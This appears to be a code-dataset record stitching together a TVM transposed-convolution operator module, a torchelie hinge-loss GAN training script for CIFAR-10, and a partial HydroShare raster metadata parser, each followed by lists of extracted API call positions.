'(layer1_filename)\n', (13056, 13073), False, 'import torch\n'), ((14431, 14477), 'os.path.join', 'os.path.join', (['args.data_dir', 'args.output_fname'], {}), '(args.data_dir, args.output_fname)\n', (14443, 14477), False, 'import os\n'), ((14505, 14550), 'os.path.join', 'os.path.join', (['args.data_dir', 'args.input_fname'], {}), '(args.data_dir, args.input_fname)\n', (14517, 14550), False, 'import os\n'), ((443, 484), 'torch.load', 'torch.load', (['args.load'], {'map_location': '"""cpu"""'}), "(args.load, map_location='cpu')\n", (453, 484), False, 'import torch\n'), ((506, 527), 'torch.load', 'torch.load', (['args.load'], {}), '(args.load)\n', (516, 527), False, 'import torch\n'), ((5313, 5398), 'torch.optim.SGD', 'optim.SGD', (['pars_lrs'], {'momentum': '(0.8)', 'nesterov': '(True)', 'weight_decay': 'args.weight_decay'}), '(pars_lrs, momentum=0.8, nesterov=True, weight_decay=args.weight_decay\n )\n', (5322, 5398), True, 'import torch.optim as optim\n'), ((6345, 6396), 'torch.sigmoid', 'torch.sigmoid', (['(3 * model.mt_net.Z_logit_s[c_ids, :])'], {}), '(3 * model.mt_net.Z_logit_s[c_ids, :])\n', (6358, 6396), False, 'import torch\n'), ((7157, 7170), 'torch.log', 'torch.log', (['sd'], {}), '(sd)\n', (7166, 7170), False, 'import torch\n'), ((8091, 8109), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (8107, 8109), False, 'import sys\n'), ((11630, 11648), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (11646, 11648), False, 'import sys\n'), ((14354, 14402), 'os.path.join', 'os.path.join', (['args.data_dir', 'args.stylelkp_fname'], {}), '(args.data_dir, args.stylelkp_fname)\n', (14366, 14402), False, 'import os\n'), ((5457, 5529), 'torch.optim.Adam', 'optim.Adam', (['pars_lrs'], {'betas': '(0.9, 0.999)', 'weight_decay': 'args.weight_decay'}), '(pars_lrs, betas=(0.9, 0.999), weight_decay=args.weight_decay)\n', (5467, 5529), True, 'import torch.optim as optim\n'), ((7929, 7940), 'time.time', 'time.time', ([], {}), '()\n', (7938, 7940), False, 
'import time\n'), ((12074, 12098), 'torch.from_numpy', 'torch.from_numpy', (['inputs'], {}), '(inputs)\n', (12090, 12098), False, 'import torch\n'), ((12131, 12156), 'torch.from_numpy', 'torch.from_numpy', (['outputs'], {}), '(outputs)\n', (12147, 12156), False, 'import torch\n'), ((7235, 7256), 'torch.exp', 'torch.exp', (['(2 * logstd)'], {}), '(2 * logstd)\n', (7244, 7256), False, 'import torch\n'), ((15587, 15608), 'torch.from_numpy', 'torch.from_numpy', (['arg'], {}), '(arg)\n', (15603, 15608), False, 'import torch\n'), ((6658, 6695), 'torch.ones', 'torch.ones', (['(1)', '(1)', '(args.human_size - 3)'], {}), '(1, 1, args.human_size - 3)\n', (6668, 6695), False, 'import torch\n'), ((6609, 6628), 'torch.ones', 'torch.ones', (['(1)', '(1)', '(3)'], {}), '(1, 1, 3)\n', (6619, 6628), False, 'import torch\n'), ((6631, 6656), 'numpy.sqrt', 'np.sqrt', (['args.first3_prec'], {}), '(args.first3_prec)\n', (6638, 6656), True, 'import numpy as np\n')] |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable, unused-argument
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
import collections
import tvm
from tvm import relay, te
from ..utils import simplify
from .dilate import dilate
from .pad import pad
from .utils import get_pad_tuple
def _ntuple(n):
def parse(x):
if isinstance(x, collections.abc.Iterable):
assert len(x) == n, f"Input can only have {n} elements, but got {len(x)} instead: {x}."
return x
return tuple(repeat(x, n))
return parse
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
def conv2d_transpose_nchw(Input, Filter, strides, padding, out_dtype, output_padding):
"""Transposed 2D convolution nchw forward operator.
Parameters
----------
Input : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
Filter : tvm.te.Tensor
4-D with shape [in_channel, num_filter, filter_height, filter_width]
strides : tuple of two ints
The spatial stride along height and width
padding : int or str
Padding size, or ['VALID', 'SAME']
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
return declaration_conv2d_transpose_impl(
Input, Filter, strides, padding, out_dtype, output_padding=output_padding
)
def conv2d_transpose_nchw_preprocess(data, kernel, strides, padding, out_dtype, output_padding):
"""Preprocess data and kernel to make the compute pattern
of conv2d_transpose the same as conv2d"""
batch, in_c, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert opad_h < stride_h and opad_w < stride_w
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_c, filter_h, filter_w),
lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
return data_pad, kernel_transform
def declaration_conv2d_transpose_impl(data, kernel, strides, padding, out_dtype, output_padding):
"""Implementation of conv2d transpose"""
data_pad, kernel_transform = conv2d_transpose_nchw_preprocess(
data, kernel, strides, padding, out_dtype, output_padding
)
batch, in_c, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_c = simplify(out_c)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_c), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
Output = te.compute(
(batch, out_c, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[b, dc, h + dh, w + dw].astype(out_dtype)
* kernel_transform[c, dc, dh, dw].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="conv2d_transpose_nchw",
)
return Output
def group_conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding, groups):
"""Group convolution operator in NCHW layout.
Parameters
----------
data : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.te.Tensor
4-D with shape [in_channel, out_channel // groups, filter_height, filter_width]
stride : int or a list/tuple of two ints
Stride size, or [stride_height, stride_width]
padding : int or a list/tuple of 2 or 4 ints
padding size, or
[pad_height, pad_width] for 2 ints, or
[pad_top, pad_left, pad_bottom, pad_right] for 4 ints
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
groups : int
number of groups
out_dtype : str
The output type. This is used for mixed precision.
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
if groups == 1:
return conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding)
# some pre-processing and prelimnary checks
if out_dtype is None:
out_dtype = data.dtype
batch, in_channels, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
assert (
in_channels % groups == 0
), f"input channels {in_channels} must divide group size {groups}"
# assert out_c % groups == 0, f"output channels {in_c} must divide group size {groups}"
strides = _pair(stride)
# padding = _pair(padding)
# output_padding = _pair(output_padding)
# dilation = _pair(dilation)
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert (
opad_h < stride_h and opad_w < stride_w
), f"[{output_padding}] opad_h:{opad_h} < stride_h:{stride_h} \
and opad_w:{opad_w} < stride_w:{stride_w} does not satisfy."
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_channels, filter_h, filter_w),
lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
batch, in_channels, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_channels = simplify(out_c * groups)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_channels // groups), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
# data: batch, in_channels, out_h, out_w
# weight: out_channels // G, in_channels, out_h, out_w
return te.compute(
(batch, out_channels, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[
b, c // (out_channels // groups) * (in_channels // groups) + dc, h + dh, w + dw
].astype(out_dtype)
* kernel_transform[
c % (out_channels // groups),
c // (out_channels // groups) * (in_channels // groups) + dc,
dh,
dw,
].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="group_conv2d_transpose_nchw",
)
def layout_transform(tensor: "relay.Expr", current_layout: str, desired_layout: str):
"""Transform a tensor with the current layout to the desired layout.
E.g. layout_transform(t, "NCHW", "CNHW") --> relay.transpose(t, [1, 0, 2, 3])
Parameters
----------
tensor: relay.Expr
The Tensor to transpose
current_layout: str
The current layout e.g. NCHW or OIHW
desired_layout: str
The desired layout, must be compatible with current_layout
Returns
-------
The layout_transformed tensor.
"""
if sorted(current_layout) != sorted(desired_layout):
raise ValueError(f"Incompatible layouts: {current_layout} vs {desired_layout}")
if current_layout == desired_layout:
return tensor
current_layout_map = {c: i for i, c in enumerate(current_layout)}
desired_layout_map = {c: i for i, c in enumerate(desired_layout)}
axes = [None] * len(current_layout)
for c, i in desired_layout_map.items():
axes[i] = current_layout_map[c]
return relay.transpose(tensor, axes=axes)
@tvm.target.generic_func
def conv2d_transpose_legalize(attrs, inputs, types):
"""Legalizes Transposed 2D convolution op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed 2D convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
data, kernel = inputs
kernel_layout = attrs["kernel_layout"]
if attrs["data_layout"] == "NHWC":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
# Set new attrs for conv2d_transpose.
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs["data_layout"] = "NCHW"
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
# Convert data to NCHW.
data = relay.transpose(data, axes=(0, 3, 1, 2))
deconv = relay.nn.conv2d_transpose(data, kernel, **new_attrs)
# Convert back to original NHWC layout.
out = relay.transpose(deconv, axes=(0, 2, 3, 1))
return out
if attrs["data_layout"] == "NCHW":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
new_attrs = {k: attrs[k] for k in attrs.keys()}
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
return relay.nn.conv2d_transpose(data, kernel, **new_attrs)
return None
| [
"tvm.relay.nn.conv2d_transpose",
"tvm.relay.transpose",
"tvm.te.compute",
"tvm.te.reduce_axis"
] | [((3445, 3589), 'tvm.te.compute', 'te.compute', (['(out_c, in_c, filter_h, filter_w)', '(lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w])'], {'name': '"""kernel_transform"""'}), "((out_c, in_c, filter_h, filter_w), lambda o, i, h, w: kernel[i][\n o][filter_h - 1 - h][filter_w - 1 - w], name='kernel_transform')\n", (3455, 3589), False, 'from tvm import relay, te\n'), ((4188, 4224), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, in_c)'], {'name': '"""dc"""'}), "((0, in_c), name='dc')\n", (4202, 4224), False, 'from tvm import relay, te\n'), ((4234, 4274), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_h)'], {'name': '"""dh"""'}), "((0, filter_h), name='dh')\n", (4248, 4274), False, 'from tvm import relay, te\n'), ((4284, 4324), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_w)'], {'name': '"""dw"""'}), "((0, filter_w), name='dw')\n", (4298, 4324), False, 'from tvm import relay, te\n'), ((7312, 7462), 'tvm.te.compute', 'te.compute', (['(out_c, in_channels, filter_h, filter_w)', '(lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w])'], {'name': '"""kernel_transform"""'}), "((out_c, in_channels, filter_h, filter_w), lambda i, o, h, w:\n kernel[o][i][filter_h - 1 - h][filter_w - 1 - w], name='kernel_transform')\n", (7322, 7462), False, 'from tvm import relay, te\n'), ((7764, 7817), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, in_channels // groups)'], {'name': '"""dc"""'}), "((0, in_channels // groups), name='dc')\n", (7778, 7817), False, 'from tvm import relay, te\n'), ((7827, 7867), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_h)'], {'name': '"""dh"""'}), "((0, filter_h), name='dh')\n", (7841, 7867), False, 'from tvm import relay, te\n'), ((7877, 7917), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_w)'], {'name': '"""dw"""'}), "((0, filter_w), name='dw')\n", (7891, 7917), False, 'from tvm import relay, te\n'), ((9642, 9676), 'tvm.relay.transpose', 'relay.transpose', (['tensor'], {'axes': 'axes'}), 
'(tensor, axes=axes)\n', (9657, 9676), False, 'from tvm import relay, te\n'), ((10650, 10690), 'tvm.relay.transpose', 'relay.transpose', (['data'], {'axes': '(0, 3, 1, 2)'}), '(data, axes=(0, 3, 1, 2))\n', (10665, 10690), False, 'from tvm import relay, te\n'), ((10708, 10760), 'tvm.relay.nn.conv2d_transpose', 'relay.nn.conv2d_transpose', (['data', 'kernel'], {}), '(data, kernel, **new_attrs)\n', (10733, 10760), False, 'from tvm import relay, te\n'), ((10823, 10865), 'tvm.relay.transpose', 'relay.transpose', (['deconv'], {'axes': '(0, 2, 3, 1)'}), '(deconv, axes=(0, 2, 3, 1))\n', (10838, 10865), False, 'from tvm import relay, te\n'), ((11190, 11242), 'tvm.relay.nn.conv2d_transpose', 'relay.nn.conv2d_transpose', (['data', 'kernel'], {}), '(data, kernel, **new_attrs)\n', (11215, 11242), False, 'from tvm import relay, te\n')] |
import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
# --- Script configuration (module-level side effects) ---
# CLI: pass --cpu to force CPU execution; otherwise CUDA is used.
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'

# Batch size, shared by the data loader and the noise sampling in train_net.
BS = 32

# Preprocessing pipeline: resize to 64px, pad to a square 64x64 canvas,
# random horizontal flips for augmentation, then convert to a float tensor.
tfms = TF.Compose([
    TF.Resize(64),
    tch.transforms.AdaptPad((64, 64)),
    TF.RandomHorizontalFlip(),
    TF.ToTensor()])

# CIFAR-10 training images (downloaded on first run).
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
                                 num_workers=4,
                                 batch_size=BS,
                                 shuffle=True)
def train_net(Gen, Discr):
    """Build a hinge-loss GAN from the given factories and train it.

    Trains on the module-level CIFAR-10 loader ``dl`` for 100 epochs with
    RAdamW (generator lr 1e-4, discriminator lr 4e-4, betas (0, 0.99)).
    A Polyak-averaged copy of the generator is kept for test-time sampling
    and logged through Visdom.

    :param Gen: generator factory, called as Gen(in_noise=128, out_ch=3)
    :param Discr: discriminator factory, called with no arguments
    """
    generator = Gen(in_noise=128, out_ch=3)
    averaged_g = copy.deepcopy(generator).eval()
    discriminator = Discr()
    print(generator)
    print(discriminator)

    def sample_noise():
        # Fresh latent batch on the training device.
        return torch.randn(BS, 128, device=device)

    def G_fun(batch):
        # Generator step: try to fool D on freshly generated samples.
        imgs = generator(sample_noise())
        scores = discriminator(imgs * 2 - 1).squeeze()
        loss = gan_loss.generated(scores)
        loss.backward()
        return {'loss': loss.item(), 'imgs': imgs.detach()}

    def G_polyak_fun(batch):
        # Test-time sampling from the Polyak-averaged generator.
        return {'imgs': averaged_g(sample_noise()).detach()}

    def D_fun(batch):
        # Discriminator step: hinge loss on fake, then on real samples.
        imgs = generator(sample_noise())
        fake_loss = gan_loss.fake(discriminator(imgs * 2 - 1))
        fake_loss.backward()
        real = batch[0]
        real_loss = gan_loss.real(discriminator(real * 2 - 1))
        real_loss.backward()
        return {'loss': real_loss.item() + fake_loss.item(),
                'real_loss': real_loss.item(),
                'fake_loss': fake_loss.item()}

    loop = GANRecipe(generator, discriminator, G_fun, D_fun, G_polyak_fun,
                     dl, log_every=100).to(device)
    loop.register('polyak', averaged_g)

    g_opt = tch.optim.RAdamW(generator.parameters(), lr=1e-4, betas=(0., 0.99))
    loop.G_loop.callbacks.add_callbacks([
        tcb.Optimizer(g_opt),
        tcb.Polyak(generator, averaged_g),
    ])
    loop.register('G_polyak', averaged_g)

    d_opt = tch.optim.RAdamW(discriminator.parameters(), lr=4e-4,
                           betas=(0., 0.99))
    loop.callbacks.add_callbacks([
        tcb.Log('batch.0', 'x'),
        tcb.WindowedMetricAvg('real_loss'),
        tcb.WindowedMetricAvg('fake_loss'),
        tcb.Optimizer(d_opt),
    ])
    loop.test_loop.callbacks.add_callbacks([
        tcb.Log('imgs', 'polyak_imgs'),
        tcb.VisdomLogger('main', prefix='test')
    ])
    loop.to(device).run(100)
# Entry point: train with torchelie's stock 64px generator and
# spectral-norm discriminator constructors.
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
| [
"copy.deepcopy",
"argparse.ArgumentParser",
"torchelie.transforms.AdaptPad",
"torchelie.callbacks.Log",
"torchelie.loss.gan.hinge.generated",
"torchvision.transforms.RandomHorizontalFlip",
"torchelie.callbacks.WindowedMetricAvg",
"torchelie.callbacks.Polyak",
"torchvision.datasets.CIFAR10",
"torch... | [((321, 346), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (344, 346), False, 'import argparse\n'), ((607, 671), 'torchvision.datasets.CIFAR10', 'CIFAR10', (['"""~/.cache/torch/cifar10"""'], {'download': '(True)', 'transform': 'tfms'}), "('~/.cache/torch/cifar10', download=True, transform=tfms)\n", (614, 671), False, 'from torchvision.datasets import MNIST, CIFAR10\n'), ((677, 752), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['ds'], {'num_workers': '(4)', 'batch_size': 'BS', 'shuffle': '(True)'}), '(ds, num_workers=4, batch_size=BS, shuffle=True)\n', (704, 752), False, 'import torch\n'), ((497, 510), 'torchvision.transforms.Resize', 'TF.Resize', (['(64)'], {}), '(64)\n', (506, 510), True, 'import torchvision.transforms as TF\n'), ((516, 549), 'torchelie.transforms.AdaptPad', 'tch.transforms.AdaptPad', (['(64, 64)'], {}), '((64, 64))\n', (539, 549), True, 'import torchelie as tch\n'), ((555, 580), 'torchvision.transforms.RandomHorizontalFlip', 'TF.RandomHorizontalFlip', ([], {}), '()\n', (578, 580), True, 'import torchvision.transforms as TF\n'), ((586, 599), 'torchvision.transforms.ToTensor', 'TF.ToTensor', ([], {}), '()\n', (597, 599), True, 'import torchvision.transforms as TF\n'), ((1033, 1068), 'torch.randn', 'torch.randn', (['BS', '(128)'], {'device': 'device'}), '(BS, 128, device=device)\n', (1044, 1068), False, 'import torch\n'), ((1146, 1171), 'torchelie.loss.gan.hinge.generated', 'gan_loss.generated', (['preds'], {}), '(preds)\n', (1164, 1171), True, 'import torchelie.loss.gan.hinge as gan_loss\n'), ((1298, 1333), 'torch.randn', 'torch.randn', (['BS', '(128)'], {'device': 'device'}), '(BS, 128, device=device)\n', (1309, 1333), False, 'import torch\n'), ((1435, 1470), 'torch.randn', 'torch.randn', (['BS', '(128)'], {'device': 'device'}), '(BS, 128, device=device)\n', (1446, 1470), False, 'import torch\n'), ((932, 948), 'copy.deepcopy', 'copy.deepcopy', (['G'], {}), '(G)\n', (945, 948), False, 
'import copy\n'), ((1843, 1905), 'torchelie.recipes.gan.GANRecipe', 'GANRecipe', (['G', 'D', 'G_fun', 'D_fun', 'G_polyak_fun', 'dl'], {'log_every': '(100)'}), '(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100)\n', (1852, 1905), False, 'from torchelie.recipes.gan import GANRecipe\n'), ((2089, 2112), 'torchelie.callbacks.Polyak', 'tcb.Polyak', (['G', 'G_polyak'], {}), '(G, G_polyak)\n', (2099, 2112), True, 'import torchelie.callbacks as tcb\n'), ((2204, 2227), 'torchelie.callbacks.Log', 'tcb.Log', (['"""batch.0"""', '"""x"""'], {}), "('batch.0', 'x')\n", (2211, 2227), True, 'import torchelie.callbacks as tcb\n'), ((2237, 2271), 'torchelie.callbacks.WindowedMetricAvg', 'tcb.WindowedMetricAvg', (['"""real_loss"""'], {}), "('real_loss')\n", (2258, 2271), True, 'import torchelie.callbacks as tcb\n'), ((2281, 2315), 'torchelie.callbacks.WindowedMetricAvg', 'tcb.WindowedMetricAvg', (['"""fake_loss"""'], {}), "('fake_loss')\n", (2302, 2315), True, 'import torchelie.callbacks as tcb\n'), ((2461, 2491), 'torchelie.callbacks.Log', 'tcb.Log', (['"""imgs"""', '"""polyak_imgs"""'], {}), "('imgs', 'polyak_imgs')\n", (2468, 2491), True, 'import torchelie.callbacks as tcb\n'), ((2501, 2540), 'torchelie.callbacks.VisdomLogger', 'tcb.VisdomLogger', (['"""main"""'], {'prefix': '"""test"""'}), "('main', prefix='test')\n", (2517, 2540), True, 'import torchelie.callbacks as tcb\n')] |
import xml.sax
import rdflib
from django.db import transaction
from hs_core.serialization import GenericResourceMeta
class RasterResourceMeta(GenericResourceMeta):
"""
Lightweight class for representing metadata of RasterResource instances.
"""
def __init__(self):
super(RasterResourceMeta, self).__init__()
self.cell_info = None
self.band_info = []
self.spatial_reference = None
def _read_resource_metadata(self):
super(RasterResourceMeta, self)._read_resource_metadata()
print("--- RasterResourceMeta ---")
# Also parse using SAX so that we can capture certain metadata elements
# in the same order in which they appear in the RDF+XML serialization.
SAX_parse_results = RasterResourceSAXHandler()
xml.sax.parse(self.rmeta_path, SAX_parse_results)
hsterms = rdflib.namespace.Namespace('http://hydroshare.org/terms/')
# Get CellInformation
for s, p, o in self._rmeta_graph.triples((None, hsterms.CellInformation, None)):
self.cell_info = RasterResourceMeta.CellInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for CellInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.name = str(name_lit)
# Get rows
rows_lit = self._rmeta_graph.value(o, hsterms.rows)
if rows_lit is None:
msg = "Rows attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.rows = int(str(rows_lit))
# Get columns
columns_lit = self._rmeta_graph.value(o, hsterms.columns)
if columns_lit is None:
msg = "Columns attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.columns = int(str(columns_lit))
# Get cellSizeXValue
cellX_lit = self._rmeta_graph.value(o, hsterms.cellSizeXValue)
if cellX_lit is None:
msg = "cellSizeXValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeXValue = float(str(cellX_lit))
# Get cellSizeYValue
cellY_lit = self._rmeta_graph.value(o, hsterms.cellSizeYValue)
if cellY_lit is None:
msg = "cellSizeYValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeYValue = float(str(cellY_lit))
# Get cellDataType
celldt_lit = self._rmeta_graph.value(o, hsterms.cellDataType)
if celldt_lit is None:
msg = "cellDataType attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellDataType = str(celldt_lit)
# Get noDateValue
nodata_lit = self._rmeta_graph.value(o, hsterms.noDataValue)
if nodata_lit is not None:
self.cell_info.noDataValue = float(str(nodata_lit))
print("\t\t{0}".format(self.cell_info))
# Get BandInformation
if SAX_parse_results:
# Use band info from SAX parser
self.band_info = list(SAX_parse_results.band_info)
else:
# Get band info from RDF
for s, p, o in self._rmeta_graph.triples((None, hsterms.BandInformation, None)):
band_info = RasterResourceMeta.BandInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.name = str(name_lit)
# Get variableName
varname_lit = self._rmeta_graph.value(o, hsterms.variableName)
if varname_lit is None:
msg = "variableName for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableName = str(varname_lit)
# Get variableUnit
varunit_lit = self._rmeta_graph.value(o, hsterms.variableUnit)
if varunit_lit is None:
msg = "variableUnit for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableUnit = str(varunit_lit)
# Get method
method_lit = self._rmeta_graph.value(o, hsterms.method)
if method_lit is not None:
band_info.method = str(method_lit)
# Get comment
comment_lit = self._rmeta_graph.value(o, hsterms.comment)
if comment_lit is not None:
band_info.comment = str(comment_lit)
self.band_info.append(band_info)
for b in self.band_info:
print("\t\t{0}".format(str(b)))
# Get spatialReference
for s, p, o in self._rmeta_graph.triples((None, hsterms.spatialReference, None)):
spat_ref_lit = self._rmeta_graph.value(o, rdflib.namespace.RDF.value)
if spat_ref_lit is None:
msg = "Spatial reference value not found for {0}.".format(o)
raise GenericResourceMeta.ResourceMetaException(msg)
self.spatial_reference = RasterResourceMeta.SpatialReference(str(spat_ref_lit))
print("\t\t{0}".format(self.spatial_reference))
@transaction.atomic
def write_metadata_to_resource(self, resource):
"""
Write metadata to resource
:param resource: RasterResource instance
"""
super(RasterResourceMeta, self).write_metadata_to_resource(resource)
if self.cell_info:
resource.metadata.cellInformation.delete()
resource.metadata.create_element('CellInformation', name=self.cell_info.name,
rows=self.cell_info.rows,
columns=self.cell_info.columns,
cellSizeXValue=self.cell_info.cellSizeXValue,
cellSizeYValue=self.cell_info.cellSizeYValue,
cellDataType=self.cell_info.cellDataType,
noDataValue=self.cell_info.noDataValue)
if len(self.band_info) > 0:
for band in resource.metadata.bandInformation:
band.delete()
for b in self.band_info:
resource.metadata.create_element('BandInformation', name=b.name,
variableName=b.variableName,
variableUnit=b.variableUnit, method=b.method,
comment=b.comment)
if self.spatial_reference:
resource.metadata.originalCoverage.delete()
values = {'units': self.spatial_reference.units,
'northlimit': self.spatial_reference.northlimit,
'eastlimit': self.spatial_reference.eastlimit,
'southlimit': self.spatial_reference.southlimit,
'westlimit': self.spatial_reference.westlimit,
'projection': self.spatial_reference.projection}
kwargs = {'value': values}
resource.metadata.create_element('OriginalCoverage', **kwargs)
class CellInformation(object):
    """Value object describing raster cell geometry and data type.

    All attributes start as None and are filled in by the metadata reader.
    noDataValue is optional.
    """
    # Attribute names, in the order they appear in the string rendering.
    _ATTRIBUTES = ("name", "rows", "columns", "cellSizeXValue",
                   "cellSizeYValue", "cellDataType", "noDataValue")

    def __init__(self):
        for attribute in self._ATTRIBUTES:
            setattr(self, attribute, None)

    def __str__(self):
        template = ("CellInformation name: {name}, "
                    "rows: {rows}, columns: {columns}, "
                    "cellSizeXValue: {cellSizeXValue}, cellSizeYValue: {cellSizeYValue}, "
                    "cellDataType: {cellDataType}, noDataValue: {noDataValue}")
        return template.format(**{a: getattr(self, a) for a in self._ATTRIBUTES})

    def __unicode__(self):
        return unicode(str(self))
class BandInformation(object):
    """Value object describing one raster band.

    method and comment are optional; everything defaults to None until the
    metadata reader fills it in.
    """
    # Attribute names, in the order they appear in the string rendering.
    _ATTRIBUTES = ("name", "variableName", "variableUnit", "method", "comment")

    def __init__(self):
        for attribute in self._ATTRIBUTES:
            setattr(self, attribute, None)

    def __str__(self):
        template = ("BandInformation name: {name}, "
                    "variableName: {variableName}, variableUnit: {variableUnit}, "
                    "method: {method}, comment: {comment}")
        return template.format(**{a: getattr(self, a) for a in self._ATTRIBUTES})

    def __unicode__(self):
        return unicode(str(self))
class SpatialReference(object):
    """Spatial reference metadata parsed from a 'key=value; ...' string.

